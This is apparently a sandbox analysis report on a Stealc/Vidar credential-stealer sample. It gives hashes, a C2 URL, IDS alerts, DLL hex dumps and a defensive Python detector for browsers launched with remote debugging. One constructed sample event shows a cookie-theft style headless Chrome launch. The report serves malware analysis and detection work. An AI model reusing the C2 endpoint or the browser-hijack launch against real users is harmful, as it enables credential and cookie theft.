Windows Analysis Report
gYjK72gL17.exe

Overview

General Information

Sample name: gYjK72gL17.exe
renamed because original name is a hash value
Original sample name: 05dc698e49fce4efae5872eb54f19767.exe
Analysis ID: 1580418
MD5: 05dc698e49fce4efae5872eb54f19767
SHA1: 29cfcfbbb21aefabe7c57a057dcf0335cb4a0ac0
SHA256: 86a95ebe542d3aed78191cf9bb40d86b7986b338e50941bf7db1ed5008a4e027
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match
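
Two of the signatures above, the Chrome Application-Bound Encryption bypass attempt and the Sigma rule for a browser started with remote debugging, usually describe one action: the stealer starts the victim's own Chromium-based browser with a DevTools remote-debugging switch and reads cookies through the DevTools protocol instead of decrypting the app-bound key itself. The report does not show the command line this sample used, so the process-creation events below are constructed and labelled as such. The detection logic is an added example written for this page, not Joe Sandbox's or the Sigma rule's code; it matches the same `--remote-debugging-` trigger the rule name implies and adds context scoring (headless mode, the real profile directory, a non-browser parent) that is this example's own addition.

```python
"""Flag Chromium-based browsers launched with a DevTools remote-debugging switch
and score the surrounding context, over Sysmon-style process-creation events."""

# Constructed events (Sysmon EID 1 field names). The report does not show the
# sample's real command line; the first event is an assumption of what a
# cookie-theft launch looks like, the second is a normal user launch, the third
# is a developer tool driving Edge over a pipe.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\user\Desktop\gYjK72gL17.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                    r'--remote-debugging-port=9222 --headless '
                    r'--user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" '
                    r'--remote-allow-origins=*'},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'},
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-pipe'},
]

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe", "opera.exe", "vivaldi.exe"}
# Parents that normally start a browser; anything else raises the score.
USER_LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def flag_remote_debugging(events):
    """Return one finding per browser launch that carries a remote-debugging switch.

    Each finding lists the indicators seen; the score is simply their count."""
    findings = []
    for ev in events:
        image = _basename(ev["Image"])
        if image not in BROWSERS:
            continue
        low = ev["CommandLine"].lower()
        if "--remote-debugging-" not in low:      # covers -port=N and -pipe
            continue
        indicators = ["remote-debugging"]
        if "--headless" in low:
            indicators.append("headless")
        if "--user-data-dir=" in low and "\\user data" in low:   # the real profile, not a scratch dir
            indicators.append("real-profile")
        if "--remote-allow-origins" in low:        # lets any origin attach to DevTools
            indicators.append("allow-origins")
        parent = _basename(ev["ParentImage"])
        if parent not in USER_LAUNCHERS:
            indicators.append(f"parent={parent}")
        findings.append({"image": image, "score": len(indicators), "indicators": indicators})
    return findings


if __name__ == "__main__":
    for f in flag_remote_debugging(SAMPLE_EVENTS):
        print(f["score"], f["image"], ", ".join(f["indicators"]))
```

On real telemetry the parent check is the discriminator: developers and test harnesses do start browsers with `--remote-debugging-port`, but from a terminal, an IDE or node, not from a freshly dropped executable in the user's profile.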

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: gYjK72gL17.exe Avira: detected
Source: 185.231.69.191/f190e2808a5419c3.php Avira URL Cloud: Label: malware
Source: http://185.231.69.191/f190e2808a5419c3.php Avira URL Cloud: Label: malware
Source: gYjK72gL17.exe.4512.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.231.69.191/f190e2808a5419c3.php"}
Source: gYjK72gL17.exe ReversingLabs: Detection: 15%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C996C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C996C80
Source: gYjK72gL17.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: gYjK72gL17.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: gYjK72gL17.exe, 00000000.00000002.2613874448.000000006C9FD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: gYjK72gL17.exe, 00000000.00000002.2613874448.000000006C9FD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49709 -> 185.231.69.191:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49709 -> 185.231.69.191:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.231.69.191:80 -> 192.168.2.6:49709
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49709 -> 185.231.69.191:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.231.69.191:80 -> 192.168.2.6:49709
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49709 -> 185.231.69.191:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.6:49787 -> 185.231.69.191:80
Source: Malware configuration extractor URLs: 185.231.69.191/f190e2808a5419c3.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
